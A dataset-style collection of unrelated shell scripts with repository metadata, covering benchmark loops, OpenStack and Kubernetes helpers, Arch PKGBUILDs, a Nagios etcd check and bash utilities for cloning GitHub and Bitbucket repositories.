if [ -z "$output_layer" ]; then
output_layer="output_0"
fi
$TRT_EXEC --onnx=$NETWORKS/$model_dir/$model_name --output=$output_layer --iterations=$ITERATIONS --avgRuns=$AVG_RUNS --fp16 | tee $LOG_DIR/$model_dir.txt
}
benchmark_onnx "FCN-ResNet18-Cityscapes-512x256"
benchmark_onnx "FCN-ResNet18-Cityscapes-1024x512"
benchmark_onnx "FCN-ResNet18-Cityscapes-2048x1024"
benchmark_onnx "FCN-ResNet18-DeepScene-576x320"
benchmark_onnx "FCN-ResNet18-DeepScene-864x480"
benchmark_onnx "FCN-ResNet18-MHP-512x320"
benchmark_onnx "FCN-ResNet18-MHP-640x360"
benchmark_onnx "FCN-ResNet18-Pascal-VOC-320x320"
benchmark_onnx "FCN-ResNet18-Pascal-VOC-512x320"
benchmark_onnx "FCN-ResNet18-SUN-RGBD-512x400"
benchmark_onnx "FCN-ResNet18-SUN-RGBD-640x512"
| true |
d4891890b1bf1a58441043150141defc0f0e50a9
|
Shell
|
vulture29/openstack-auto-deploy
|
/scripts/user_config.sh
|
UTF-8
| 4,273 | 3.390625 | 3 |
[] |
no_license
|
#!/bin/bash
USER_INPUT=1;
CUSTOMIZED_CONFIG_PATH="config/rc.conf"
DEFAULT_CONFIG_PATH="config/rc.conf.default"
echo ""
while read -p "Want to proceed with default config -- allinone?(yes/no) " REPLY1 ; do
case $REPLY1 in
yes)
echo ""
echo "--> Installing with the default config."
# install with allinone
# update the CONFIG_FILE_PATH to default
CONFIG_FILE_PATH=config/rc.conf.default
break;;
no)
echo ""
echo "--> Checking if the customized config file is existed."
if [ -f $CUSTOMIZED_CONFIG_PATH ]; then
# the customized config file is existed
echo ""
echo "The customized config file is existed."
echo ""
while read -p "Install with the existed file?(yes/no) " REPLY2 ; do
case $REPLY2 in
yes)
echo ""
echo "--> Installing with the existed config file."
USER_INPUT=0;
# install with the existed config file
# update the CONFIG_FILE_PATH to user configured file
CONFIG_FILE_PATH=config/rc.conf
break;;
no)
break;;
*)
echo ""
echo "Please enter (yes) or (no).";;
esac
done
else
echo ""
echo "The customized config file is not existed."
fi
if [ $USER_INPUT -eq 1 ]; then
echo ""
echo "--> Starting user input configuration."
# user input configuration
echo ""
read -p "Please enter the network node IP (x.x.x.x): " NETWORK_IP
echo ""
read -p "Please enter the compute node IP (x.x.x.x): " COMPUTE_IP
echo ""
read -p "Please enter the controller node IP (x.x.x.x): " CONTROLLER_IP
echo ""
read -p "Please enter the storage node IP (x.x.x.x): " STORAGE_IP
echo ""
while read -p "Do you want to enable NOVA?(y/n)" NOVA_ENABLE ; do
case $NOVA_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
while read -p "Do you want to enable NEUTRON?(y/n)" NEUTRON_ENABLE ; do
case $NEUTRON_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
while read -p "Do you want to enable GLANCE?(y/n)" GLANCE_ENABLE ; do
case $GLANCE_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
while read -p "Do you want to enable HORIZON?(y/n)" HORIZON_ENABLE ; do
case $HORIZON_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
while read -p "Do you want to enable CINDER?(y/n)" CINDER_ENABLE ; do
case $CINDER_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
while read -p "Do you want to enable SWIFT?(y/n)" SWIFT_ENABLE ; do
case $SWIFT_ENABLE in
y) break;;
n) break;;
*)
echo ""
echo "Please enter y/n.";;
esac
done
echo ""
cp $DEFAULT_CONFIG_PATH $DEFAULT_CONFIG_PATH".bkg"
sed -i "s/^CONFIG_CONTROLLER_HOST.*$/CONFIG_CONTROLLER_HOST=$CONTROLLER_IP/g" $DEFAULT_CONFIG_PATH
sed -i "s/^CONFIG_NETWORK_HOST.*$/CONFIG_NETWORK_HOST=$NETWORK_IP/g" $DEFAULT_CONFIG_PATH
sed -i "s/^CONFIG_COMPUTE_HOST.*$/CONFIG_COMPUTE_HOST=$COMPUTE_IP/g" $DEFAULT_CONFIG_PATH
sed -i "s/^CONFIG_STORAGE_HOST.*$/CONFIG_STORAGE_HOST=$STORAGE_IP/g" $DEFAULT_CONFIG_PATH
sed -i "s/^CONFIG_NOVA_INSTALL.*$/CONFIG_NOVA_INSTALL=$NOVA_ENABLE/g" "$DEFAULT_CONFIG_PATH"
sed -i "s/^CONFIG_NEUTRON_INSTALL.*$/CONFIG_NEUTRON_INSTALL=$NEUTRON_ENABLE/g" "$DEFAULT_CONFIG_PATH"
sed -i "s/^CONFIG_GLANCE_INSTALL.*$/CONFIG_GLANCE_INSTALL=$GLANCE_ENABLE/g" "$DEFAULT_CONFIG_PATH"
sed -i "s/^CONFIG_HORIZON_INSTALL.*$/CONFIG_HORIZON_INSTALL=$HORIZON_ENABLE/g" "$DEFAULT_CONFIG_PATH"
sed -i "s/^CONFIG_CINDER_INSTALL.*$/CONFIG_CINDER_INSTALL=$CINDER_ENABLE/g" "$DEFAULT_CONFIG_PATH"
sed -i "s/^CONFIG_SWIFT_INSTALL.*$/CONFIG_SWIFT_INSTALL=$SWIFT_ENABLE/g" "$DEFAULT_CONFIG_PATH"
# update the CONFIG_FILE_PATH to config file
CONFIG_FILE_PATH=config/rc.conf
# install with the default config file
echo "--> Installing with the config file."
fi
break;;
*)
echo ""
echo "Please enter (yes) or (no).";;
esac
done
| true |
000d792b010401b92f7b21437750096847ef4ac3
|
Shell
|
palmer-dabbelt/home
|
/.local/src/paset.bash
|
UTF-8
| 600 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
snkname="$(pacmd list-sinks | grep "name: .*$1.*" | grep -v ".monitor" | sed 's@ *name: <\([A-Za-z0-9_.-]*\)>.*@\1@' | xargs echo)"
srcname="$(pacmd list-sources | grep "name: .*$1.*" | grep -v ".monitor" | sed 's@ *name: <\([A-Za-z0-9_.-]*\)>.*@\1@' | xargs echo)"
pacmd << EOF
set-default-source $srcname
set-default-sink $snkname
EOF
pactl list sink-inputs short | cut -f1 | while read index
do
pacmd move-sink-input "$index" "$snkname"
done
pactl list source-outputs short | grep -v "25Hz" | cut -f1 | while read index
do
pacmd move-source-output "$index" "$srcname"
done
| true |
7ec31ab15e80478f988ba12b469aea95e71a88e3
|
Shell
|
lisuke/repo
|
/archlinuxcn/numix-icon-theme/PKGBUILD
|
UTF-8
| 799 | 2.671875 | 3 |
[] |
no_license
|
# Maintainer: Maxime Gauduin <alucryd@archlinux.org>
# Contributor: Diego <cdprincipe@gmail.com>
# Current Maintainer <erik.dubois@gmail.com>
pkgname=numix-icon-theme
pkgver=23.04.26.r0.g71b89af4f
pkgrel=1
pkgdesc='Base icon theme from the Numix project'
arch=('any')
url='https://github.com/numixproject/numix-icon-theme'
license=('GPL3')
depends=()
makedepends=('git')
provides=('numix-icon-theme' 'numix-light-icon-theme')
conflicts=('numix-icon-theme' 'numix-light-icon-theme')
options=('!strip')
source=('git+https://github.com/numixproject/numix-icon-theme.git')
sha256sums=('SKIP')
pkgver() {
git -C numix-icon-theme describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
package() {
cd numix-icon-theme
install -dm 755 "$pkgdir"/usr/share/icons
cp -dr --no-preserve='ownership' Numix{,-Light} "$pkgdir"/usr/share/icons/
}
| true |
c602af64cee86f89cdfa9816d07bd4410eae6841
|
Shell
|
membly/homeworkLinux
|
/usr/bin/service_script.sh
|
UTF-8
| 303 | 3.140625 | 3 |
[] |
no_license
|
#!/bin/bash
mkfifo /tmp/notifyfifo
chomod 777 /tmp/notifyfifo
systemd-notify --ready --status "Waiting for data"
while : ; do
read a < /tmp/notifyfifo
systemd-notify --status="Processing script"
echo -e "\n$(date +"%m-%d-%y %T")\tSleep script was started" >> /tmp/service_script.log
done
| true |
c86aaee9c8ebadb31edd5e559b97124025a556a2
|
Shell
|
crazzyfool/scripts
|
/parameter-0.2.sh
|
UTF-8
| 2,746 | 3.703125 | 4 |
[] |
no_license
|
#!/bin/bash
echo ' ____ __ ____ ___ _ _ ___ _ _ ____ ___ __ _ ____ ____ ';
echo '( _ \ / _\(_ _)/ __)/ )( \ ___ / __)/ )( \( __)/ __)( / )( __)( _ \';
echo ' ) __// \ )( ( (__ ) __ ((___)( (__ ) __ ( ) _)( (__ ) ( ) _) ) /';
echo '(__) \_/\_/(__) \___)\_)(_/ \___)\_)(_/(____)\___)(__\_)(____)(__\_)';
echo ' ';
USERNAME=""
TICKET=""
DIRECTORY=$USERNAME-$TICKET
HOME="/home/wirehive"
PID=".dont-run.pid"
unset USERNAME
unset TICKET
while getopts u:t: option; do
case ${option} in
u )
USERNAME=${OPTARG}
;;
t )
TICKET=${OPTARG}
;;
*)
echo $1: unknown option >&2
exit 1
;;
esac
done
# takes input and returns with trimmed leading and trailing white space
trim_white_space() {
# trim space from input and return
echo "$(echo -e "${1}" | tr -d '[:space:]')"
}
validateUsername() {
# trim space from input
TRIMMED_NAME="$(trim_white_space "$1")"
# if input is not null
if [[ ! -z "$TRIMMED_NAME" ]] && [[ "$TRIMMED_NAME" =~ ^[A-Za-z]+$ ]]; then
#echo "not null and only contains letters!"
#echo "Username=$TRIMMED_NAME"
return 0
# if input is null
else
#echo "null or contains numbers:"
#echo "Username=$TRIMMED_NAME"
return 2
fi
}
#echo "validateUsername test:"
#echo " ap1ike "
#validateUsername " ap1ike "
#echo "(null)"
#validateUsername ""
if [[ "$(validateUsername '')" -eq 2 ]]; then
echo "Success!"
elif [[ "$(validateUsername '')" -eq 0 ]]; then
echo "Failed!"
else
echo "Not sure what would cause this!!"
fi
getPidData() {
if [ ! -f $PID ]; then
echo "PID not found"
exit 1
else
read -r firstline<$PID
OPTS=$(echo $firstline | tr ":" " ")
echo "OPTS: $OPTS"
for i in $OPTS; do
echo $i
done
fi
}
if [ -f $PID ]; then
echo "PID found! Checking for data...."
getPidData
#read -r firstline<$PID
#OPTS=$(echo $firstline | tr ":" " ")
#echo "OPTS: $OPTS"
#echo "firstline: $firstline"
#echo $(echo $firstline | tr ":" " ")
if [ ! -z "$OPTS" ] && [ $($OPT | wc -w) -le 2 ]; then
echo "yay"
fi
else
echo "PID not found, checking to see if parameters were passed....."
fi
#if [ -z $USERNAME ] && [ -z $TICKET ]; then
# echo "No parameters passed"
# if [ -f $PID ]; then
# echo "Found PID!"
# fi
#elif [ ! -z $USERNAME ] && [ -z $TICKET ]; then
# echo "Username provided but no ticket!"
#elif [ -z $USERNAME ] && [ ! -z $TICKET ]; then
# echo "Ticket provided but not the username!"
#else
# echo "Username and ticket provided!"
# echo "$USERNAME"
# echo "$TICKET"
#fi
#if [ -z "$USERNAME" ]; then
# echo "No options received, checking for PID......"
# exit
#fi
#echo $USERNAME-$TICKET
| true |
b35c1859a824f60b1382b72f82cd1607f4407fb1
|
Shell
|
GGCCoder/Linux
|
/Bash/array/ex1_7.sh
|
UTF-8
| 332 | 2.90625 | 3 |
[] |
no_license
|
# selection sort
i=0
array=($*)
while [ $i -lt ${#array[@]} ]
do
idx=$i
j=$[$i+1]
while [ $j -lt ${#array[@]} ]
do
if [ ${array[idx]} -lt ${array[j]} ]
then
idx=$j
fi
let j++
done
# echo "idx = ${idx}, value = ${array[idx]}"
tmp=${array[i]}
array[i]=${array[idx]}
array[idx]=$tmp
let i++
done
echo ${array[@]}
| true |
6ce853f180fd7eff53b4f627cf4147d9713e0611
|
Shell
|
android1and1/saltit
|
/scripts/tests/test_unsaltit
|
UTF-8
| 1,121 | 3.078125 | 3 |
[] |
no_license
|
#!/bin/bash
# filename test_unsaltit
# first of first,include abs root(directory) name.
# then start the famous 'The Quartet'.
# get some global variable -- "FUNCPATH" "ABSROOT" "include_all" "echotest" ..
project_dir=$( cd $( dirname $0 ) && cd ../../ && pwd -P )
. $project_dir/conf/abs.conf
. $project_dir/conf/options.conf
. ${FUNCPATH}/base 2>/dev/null
# disable all debug infomations of each function.
DEBUG=0
TEMPDIR=${ABSROOT}/temp/temp16
mkdir -p $TEMPDIR
echo 'data here .' > $TEMPDIR/a.txt
echo 'b.txt,after some while we will meet again.' > $TEMPDIR/b.txt
echo 'data here baby girl.' > $TEMPDIR/c.txt
touch $TEMPDIR/.token
echo 'a.txt' > $TEMPDIR/.ignores
# create real data file(crypted)
actively
sleep 1
# first test
echotest "1st test,can run at last?"
# because at line no.7 there is a "cd ../../" means we are at working dir:saltit.
./scripts/unsaltit
iisr "$? -eq 0"
# second test
echotest "2nd test,really got decode_encoded file?"
cat ${ABSROOT}/DE_uploads/*b.txt
iisr "$? -eq 0"
# home keeping
rm -rf $TEMPDIR
rm -rf ${UPLOADS}/*data
rm -rf ${UPLOADS}/.flag
rm -rf ${ABSROOT}/DE_uploads/
| true |
c04a134de4e365166b9b645d030d78de7e03541b
|
Shell
|
coollog/kash
|
/kash
|
UTF-8
| 605 | 3.828125 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
if [ -z "$1" ]; then
echo "Usage: ./kash <IMAGE>"
exit
fi
POD_IMAGE=$1
POD_NAME=$(uuidgen | tr "[:upper:]" "[:lower:]")
# Applies the Pod template.
cat k8s/kash-pod.yaml |
sed -e "s/{POD_NAME}/${POD_NAME}/" |
sed -e "s/{POD_IMAGE}/${POD_IMAGE}/" |
kubectl apply -f -
echo "Running pod ${POD_NAME}..."
# Waits for the Pod to start running.
while [ $(kubectl get po ${POD_NAME} -o jsonpath="{.status.phase}") != "Running" ]
do
sleep 1
done
# Attaches the to the Pod.
kubectl attach -it ${POD_NAME} -c container
# Cleans up the Pod.
kubectl delete po ${POD_NAME}
| true |
0b25ca2d786b57d58c942f55e0732544637b199a
|
Shell
|
ruixueqingyang/OAO-Translator
|
/benchmarks/PolyBench/plain/BICG/bicg.sh
|
UTF-8
| 526 | 2.515625 | 3 |
[] |
no_license
|
#!/bin/bash
cd /home/anjushi/work/polybench/plain/BICG
make clean
export LD_LIBRARY_PATH=/home/wfr/install/LLVM-9/install-9/lib:$LD_LIBRARY_PATH
FILE="/home/anjushi/work/polybench/plain/BICG/result_1.txt"
make DEBUG=-D_DEBUG_1 OMP0 #OMP
make DAWN_1 #DawnCC
make DEBUG=-D_DEBUG_1 OAO #OAO
cmdcu1=`./OMP` #OMP
cmdcu2=`./DAWN_1.bin` #DawnCC_1
cmdcu3=`nvprof --csv --print-gpu-trace ./OAO.bin` #OAO
aaa1=${cmdcu1}
aaa2=${cmdcu2}
aaa3=${cmdcu3}
echo -e "OMP\n""$aaa1\n""DAWN\n""$aaa2\n""OAO\n""$aaa3" > $FILE
#
| true |
9d85d73916602b8fd8f8ff520eae33cd99fdbb9b
|
Shell
|
rkumar/cetus
|
/scripts/zip
|
UTF-8
| 537 | 4.375 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# This script zips the contents of selected_files
# It prompts for a file name to create, and defaults to archive.zip
# If no files were selected, then current file under cursor is zipped.
FILE=~/tmp/selected_files
TODAY=$(date +"%Y%m%d%H%M")
TARGET=archive_${TODAY}.zip
pwd
if [[ -f $FILE ]]; then
wc -l $FILE
else
printf "Using $1. "
TARGET="$1.zip"
echo "$1" > $FILE
fi
printf "Enter zip file name ($TARGET): "
read ANSWER
ANSWER=${ANSWER:-$TARGET}
cat $FILE | zip "$ANSWER" -@
printf "Created #{ANSWER}"
| true |
c643bf6c9c79f22c7ba0184e4a463a3892be9e97
|
Shell
|
rohit-htc/CommandLine-Utilities
|
/prewrite
|
UTF-8
| 558 | 3.609375 | 4 |
[] |
no_license
|
#!/bin/bash
if [ $# -eq 1 ]
then
inputfile="-"
elif [ $# -eq 2 ]
then
if [ -f "$1" ]
then
inputfile=$1
else
inputtext=$1
fi
shift;
else
echo 'Usage: prewrite [text|filename] filename' 2>&1; exit 2
fi
if [ -z "$inputfile" ]
then
cat $1 | xclip -i && echo "$inputtext" > $1 && xclip -o >> $1
else
cat $1 | xclip -i && cat "$inputfile" > $1 && xclip -o >> $1
fi
#case $# in
#1) inputtext="-" ;;
#2) if
#*) echo 'Usage: prewrite [text] filename' 2>&1; exit 2
#esac
#cat "$inputtext";
#cat $1 | xclip -i && echo "$inputtext" > $1 && xclip -o >> $1
| true |
e41370e373870012a20ddc37bd9154e009de0ed7
|
Shell
|
BoiseState/string-constraint-counting
|
/scripts/shell/set_class_path_var.sh
|
UTF-8
| 697 | 3.515625 | 4 |
[] |
no_license
|
#! /usr/bin/env bash
# get directory of this script as current working directory
proj_root="$( cd "$( dirname "${BASH_SOURCE[0]}" )/.." && pwd )"
class_path="$proj_root/bin"
# for each jar file in lib directory
for jar_file in $proj_root/lib/*.jar
do
# get filename
f_name=${jar_file##*/}
# add jar file to class path
class_path="$class_path:$proj_root/lib/$f_name"
done
# for each dylib file in lib directory
for dylib_file in $proj_root/lib/*.dylib
do
# get filename
f_name=${dylib_file##*/}
# add dylib file to class path
class_path="$class_path:$proj_root/lib/$f_name"
done
# echo only the class path to be read by other bash scripts
echo $class_path
| true |
d68f3e7e2e889b82be2e4cce4d3c4093c637fdef
|
Shell
|
faust64/puppet
|
/modules/nagios/files/custom_plugins/check_etcd
|
UTF-8
| 1,411 | 3.6875 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/bin/sh
# check_etcd - watch etcd cluster health
# 20180626 - smoro@redhat.com
PRG=`basename $0`
OK=0
WARNING=1
CRITICAL=2
UNKNOWN=3
msg=": Nothing to report"
ret=OK
TMPFILE=/tmp/.$PRG.$$
if test -f /etc/etcd/etcd.conf; then
. /etc/etcd/etcd.conf
elif test -f /etc/etcd.env; then
. /etc/etcd.env
fi
CLIENT_CA="$ETCD_PEER_TRUSTED_CA_FILE"
CLIENT_CERT="$ETCD_PEER_CERT_FILE"
CLIENT_KEY="$ETCD_PEER_KEY_FILE"
ETCD_ENDPOINTS=$(echo $ETCD_INITIAL_CLUSTER | sed -e 's|^[^=]*=||' -e 's|,[^=]*=|,|g' | sed 's|:2380|:2379|g')
if test -z "$ETCD_ENDPOINTS"; then
ret=UNKNOWN
msg=": failed identifying advertise URL"
elif ! etcdctl --endpoints "$ETCD_ENDPOINTS" \
"--cacert=$CLIENT_CA" \
"--cert=$CLIENT_CERT" \
"--key=$CLIENT_KEY" endpoint health >$TMPFILE 2>&1; then
ret=UNKNOWN
msg=": failed querying etcd"
elif ! grep -i ' is healthy' $TMPFILE >/dev/null 2>&1; then
ret=CRITICAL
msg=": cluster is not healthy"
else
nmembers=`awk 'BEG{c=0}/member/{c=c+1}END{print c}' $TMPFILE`
nunhealthy=`awk 'BEG{c=0}/is unhealthy/{c=c+1}END{print c}' $TMPFILE`
rmembers=`echo "$ETCD_INITIAL_CLUSTER" | awk -F, 'END{print NF}'`
if test "$nmembers" -ne "$rmembers"; then
ret=WARNING
msg=": etcd members missing"
elif test "$nunhealthy" -gt 0; then
ret=WARNING
msg=": has unhealthy members"
fi
fi
rm -f $TMPFILE
echo "ETCD-status $ret$msg"
eval ret=\$$ret
exit $ret
| true |
4d8d6e83465defe2c3eecfa879dcc11bb6f75168
|
Shell
|
shahidv3/locust_docker
|
/run.sh
|
UTF-8
| 576 | 2.84375 | 3 |
[] |
no_license
|
#!/bin/bash
LOCUST_CMD="/usr/local/bin/locust"
LOCUST_FILE_PATH="-f $LOCUST_FILE"
LOCUST_MODE=${LOCUST_MODE:-standalone}
if [ "$LOCUST_MODE" = "master" ]; then
LOCUST_FILE_PATH="$LOCUST_FILE_PATH --csv=reports host=$TARGET_URL --master --no-web -c $USERS -r $HATCH_RATE -t $RUN_TIME --expect-slaves $SLAVES"
elif [ "$LOCUST_MODE" = "slave" ]; then
LOCUST_FILE_PATH="$LOCUST_FILE_PATH --host=$TARGET_URL --slave --master-host=$MASTER_HOST"
fi
echo "$LOCUST_CMD $LOCUST_FILE_PATH"
$LOCUST_CMD $LOCUST_FILE_PATH
| true |
113a44c2a836836001e20a5c623e390fee24fa7b
|
Shell
|
rjeschmi/conda-ice40-builds
|
/.travis/after_success.sh
|
UTF-8
| 886 | 3.28125 | 3 |
[] |
no_license
|
#!/bin/bash
source .travis/common.sh
set -e
# Close the after_success fold travis has created already.
travis_fold end after_success
if [ -z "$SKIP_BUILD" ]; then
start_section "package.contents" "${GREEN}Package contents...${NC}"
tar -jtf $CONDA_OUT | sort
end_section "package.contents"
fi
if [ x$TRAVIS_BRANCH = x"master" -a x$TRAVIS_EVENT_TYPE != x"cron" -a x$TRAVIS_PULL_REQUEST == xfalse -a -z "$SKIP_BUILD" ]; then
$SPACER
start_section "package.upload" "${GREEN}Package uploading...${NC}"
anaconda -t $ANACONDA_TOKEN upload --user $ANACONDA_USER --label main $CONDA_OUT
end_section "package.upload"
fi
$SPACER
if [ -z "$SKIP_BUILD" ]; then
start_section "success.tail" "${GREEN}Success output...${NC}"
echo "Log is $(wc -l /tmp/output.log) lines long."
echo "Displaying last 1000 lines"
echo
tail -n 1000 /tmp/output.log
end_section "success.tail"
fi
| true |
766c75d641ec1cc0e022a759a8e0128004b9216d
|
Shell
|
petronny/aur3-mirror
|
/yoono/PKGBUILD
|
UTF-8
| 1,230 | 2.734375 | 3 |
[] |
no_license
|
# Maintainer: grimsock <lord.grimsock at gmail dot com>
# Contributor: Dongsheng Cai <dongsheng at moodle {dot} com>
# Contributor: Mcder3 <mcder3[at]gmail[dot]com>
pkgname=yoono
_altpkgname=yoono-desktop
pkgver=1.8.44
pkgrel=1
pkgdesc="Allows you to connect to all your social networks and IM services"
arch=('i686' 'x86_64')
url="http://www.yoono.com"
license=('custom:yoono')
if [ "$CARCH" = "i686" ]; then
depends=('xulrunner')
elif [ "$CARCH" = "x86_64" ]; then
depends=('lib32-xulrunner')
fi
source=("http://cdn.yoono.com/desktop/${_altpkgname}-${pkgver}.tar.bz2"
"yoono"
"yoono.desktop")
md5sums=('7581c3a52ac9292883acae7fa11eea7f'
'c4ef2d69caac5b00d69cbfe6cb27a495'
'723b2875156c48d89a5680b1b212af40')
package() {
cd "${srcdir}"
mkdir -p "${pkgdir}/opt/${pkgname}"
cp -r "./${_altpkgname}/"* "${pkgdir}/opt/${pkgname}"
cd "${pkgdir}/opt/${pkgname}"
# install icon, desktop files
install -Dm644 "${srcdir}/${_altpkgname}/chrome/branding/content/icon64.png" "${pkgdir}/usr/share/pixmaps/yoono.png"
install -Dm644 "${srcdir}/${pkgname}.desktop" "${pkgdir}/usr/share/applications/${pkgname}.desktop"
install -Dm755 "${srcdir}/${pkgname}" "${pkgdir}/usr/bin/${pkgname}"
}
| true |
4b5b5ce254a44899b4d0398bcfb43cea400422e0
|
Shell
|
eusougz/shellscripts
|
/aula9-scripts-estrutura-repeticao/palindrome.sh
|
UTF-8
| 179 | 3.234375 | 3 |
[] |
no_license
|
#!/bin/bash
while read line; do
words=$(echo $line | sed "s/[^a-z]//g")
reverse=$(echo $words | rev)
if [ "$words" = "$reverse" ]; then
echo Yes
else
echo No
fi
done
| true |
4bf849f5bc3ccd05a51c71cb496dc5813d30baf4
|
Shell
|
christophercaburog/Centos-Dotfiles-Final
|
/dotfiles/bash_functions
|
UTF-8
| 7,349 | 3.890625 | 4 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
UTF_8_HEAVY_BALLOT_X='\xe2\x9c\x98'
UTF_8_HEAVY_CHECK_MARK='\xe2\x9c\x94'
UTF_8_HEAVY_WARNING_SIGN='\xe2\x9a\xa0'
UTF_8_INFORMATION_SOURCE='\xe2\x84\xb9'
UTF_8_BLACK_RIGHT_POINTING_INDEX='\xE2\x98\x9B'
function print_available_terminal_colors {
T='gYw' # The test text
echo -e "\n 40m 41m 42m 43m\
44m 45m 46m 47m";
for FGs in ' m' ' 1m' ' 30m' '1;30m' ' 31m' '1;31m' ' 32m' \
'1;32m' ' 33m' '1;33m' ' 34m' '1;34m' ' 35m' '1;35m' \
' 36m' '1;36m' ' 37m' '1;37m';
do FG=${FGs// /}
echo -en " $FGs \033[$FG $T "
for BG in 40m 41m 42m 43m 44m 45m 46m 47m;
do echo -en "$EINS \033[$FG\033[$BG $T \033[0m";
done
echo;
done
echo
}
function print_task {
echo -e "${UTF_8_BLACK_RIGHT_POINTING_INDEX} $1"
}
function print_success {
echo -e "\033[01;32m ${UTF_8_HEAVY_CHECK_MARK} \033[00m"
}
function print_info {
echo -e "\033[01;34m ${UTF_8_INFORMATION_SOURCE} $*\033[00m"
}
function print_warning {
echo -e "\033[01;33m ${UTF_8_HEAVY_WARNING_SIGN} $*\033[00m"
}
function print_error {
echo -e "\033[01;31m ${UTF_8_HEAVY_BALLOT_X} $*\033[00m"
}
function execute_command {
usage="execute-command CMD [BANNER] [error/warning]"
[ -z "$1" ] && echo "$usage" && return
cmd=$1
banner=${2-$1}
reporter=${3-error}
[ "$reporter" != "error" ] \
&& [ "$reporter" != "warning" ] \
&& echo "$usage" \
&& return
echo -n "${banner} ..."
error=$($cmd 2>&1 >/dev/null)
status=$?
if [ $status -eq 0 ]; then
print_success
else
print_"${reporter}" "$error"
fi
return $status
}
# Usage example: clone_github_user_repos cnadiminti
function clone_github_user_repos {
user=${1-cnadiminti}
execute_command "mkdir -p $user"
last_page=$(curl -Iks https://api.github.com/orgs/"$user"/repos | grep Link: | awk -F'=|>' '{ print $5 }')
for p in $(seq 1 "$last_page"); do
print_task "Working on page# $p"
for repo in $(curl -ks https://api.github.com/users/"$user"/repos?page="$p" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| puts repo["clone_url"] }'); do
execute_command "git -C $user clone -q $repo"
done
done
}
# Usage example: clone_github_org_repos sensu
function clone_github_org_repos {
org=$1
if [ -z "$org" ] ; then
print_info 'Usage: clone_github_org_repos [ORG-NAME]'
return
fi
execute_command "mkdir -p $org"
last_page=$(curl -Iks https://api.github.com/orgs/"$org"/repos | grep Link: | awk -F'=|>' '{ print $5 }')
for p in $(seq 1 "$last_page"); do
print_task "Working on page# $p"
for repo in $(curl -ks https://api.github.com/orgs/"$org"/repos?page="$p" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read).each { |repo| puts repo["clone_url"] }'); do
execute_command "git -C $org clone -q $repo"
done
done
}
function git_project_fetch {
for f in $1/*; do
print_task "$f"
execute_command "[ -d $f ]" " Is Directory?" "warning"
if [ $? -eq 0 ]; then
execute_command "git -C $f rev-parse" " Is git repo?" "warning"
if [ $? -eq 0 ]; then
execute_command "git -C $f fetch" " Fetching"
fi
fi
done
}
function git_project_pull {
for f in $1/*; do
print_task "$f"
execute_command "[ -d $f ]" " Is Directory?" "warning"
if [ $? -eq 0 ]; then
execute_command "git -C $f rev-parse" " Is git repo?" "warning"
if [ $? -eq 0 ]; then
execute_command "git -C $f pull" " Pulling"
fi
fi
done
}
function clone_bitbucket_proj {
proj=$1
if [ -z "$proj" ] ; then
print_info 'Usage: clone_bitbucket_proj [PROJECT-NAME]'
return
fi
if [ -z "$BITBUCKET_HOST" ]; then
echo -n "Please enter your Bitbucket Host: "
read -r BITBUCKET_HOST
fi
if [ -z "$BITBUCKET_USER" ]; then
echo -n "Please enter your Bitbucket Username: "
read -r BITBUCKET_USER
fi
if [ -z "$BITBUCKET_PASS" ]; then
echo -n "Please enter your Bitbucket Password: "
read -sr BITBUCKET_PASS
echo ''
fi
execute_command "mkdir -p $proj"
isLastPage=false
start=0
while [ "$isLastPage" == "false" ]; do
json=$(curl -sk -u "${BITBUCKET_USER}:${BITBUCKET_PASS}" -H "Content-Type: application/json" "${BITBUCKET_HOST}/rest/api/1.0/projects/$proj/repos?start=${start}")
isLastPage=$(echo "$json" | ruby -rubygems -e 'require "json"; puts JSON.load(STDIN.read)["isLastPage"]')
start=$(echo "$json" | ruby -rubygems -e 'require "json"; puts JSON.load(STDIN.read)["nextPageStart"]')
for repo in $(echo "$json" | ruby -rubygems -e 'require "json"; JSON.load(STDIN.read)["values"].each { |repo| repo["links"]["clone"].each { |url| puts url["href"] if (url["name"] = "ssh" and url["href"].match('/^ssh/')) }}'); do
execute_command "git -C $proj clone -q $repo"
done
done
}
function system_info {
export SYS_OS_NAME=$(uname -s)
export SYS_OS_RELEASE=$(uname -r)
export SYS_OS_VERSION=$(uname -v)
export SYS_HARDWARE_NAME=$(uname -m)
export SYS_PROCESSOR_TYPE=$(uname -p)
if [ "${SYS_OS_NAME}" = "Linux" ] ; then
if [ -f /etc/redhat-release ]; then
export SYS_OS_TYPE=redhat
elif [ -f /etc/system-release ]; then
export SYS_OS_TYPE=redhat
elif [ -f /etc/debian_version ]; then
export SYS_OS_TYPE=debian
elif [ -f /etc/SuSE-release ]; then
export SYS_OS_TYPE=suse
fi
if [ -r /etc/os-release ] ; then
# shellcheck disable=SC1091
export SYS_OS_DIST_NAME=$(source /etc/os-release && echo "$NAME")
# shellcheck disable=SC1091
export SYS_OS_DIST_ID=$(source /etc/os-release && echo "$ID")
# shellcheck disable=SC1091
export SYS_OS_DIST_VERSION=$(source /etc/os-release && echo "$VERSION_ID")
fi
elif [ "${SYS_OS_NAME}" = "Darwin" ]; then
export SYS_OS_DIST_ID=$(sw_vers | grep ProductName | sed 's/ProductName:[ ]*//' | xargs)
export SYS_OS_DIST_VERSION=$(sw_vers | grep ProductVersion | sed 's/ProductVersion:[ ]*//'| xargs)
fi
if [ "$1" = "-v" ]; then
echo "SYS_OS_NAME=$SYS_OS_NAME"
echo "SYS_OS_TYPE=$SYS_OS_TYPE"
echo "SYS_OS_RELEASE=$SYS_OS_RELEASE"
echo "SYS_OS_VERSION=$SYS_OS_VERSION"
echo "SYS_HARDWARE_NAME=$SYS_HARDWARE_NAME"
echo "SYS_PROCESSOR_TYPE=$SYS_PROCESSOR_TYPE"
